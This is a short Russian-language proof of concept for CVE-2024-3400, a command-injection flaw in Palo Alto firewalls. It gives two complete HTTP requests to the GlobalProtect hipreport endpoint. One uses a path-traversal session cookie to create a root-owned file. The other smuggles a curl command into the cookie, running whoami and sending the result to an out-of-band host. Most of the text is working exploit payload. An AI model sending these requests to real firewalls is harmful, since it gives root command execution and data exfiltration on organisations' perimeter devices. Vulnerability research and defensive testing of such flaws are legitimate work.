
Доказательство концепции эксплуатации CVE-2024-3400, уязвимости внедрения команд в межсетевых экранах Palo Alto, демонстрирующее создание файлов и удалённое выполнение команд с помощью специально сформированных HTTP-запросов.
CVE-2024-3400 — это уязвимость внедрения команд в межсетевых экранах Palo Alto. Отправляя специально сформированный HTTP-запрос, злоумышленник может выполнить произвольные команды на целевом сервере и даже получить root-права.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
После отправки этого запроса на сервере будет создан файл с именем hellome1337.txt, и этот файл будет иметь root-права.
Скриншоты демонстрируют результат эксплуатации этой уязвимости:


Чтобы использовать эту уязвимость для внедрения команд, вы можете отправить следующий HTTP-запрос:
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Этот запрос выполнит команду whoami на сервере и отправит результат на указанный удалённый сервер (например: xxxxxxxxxxxxxxxxx.oast.fun).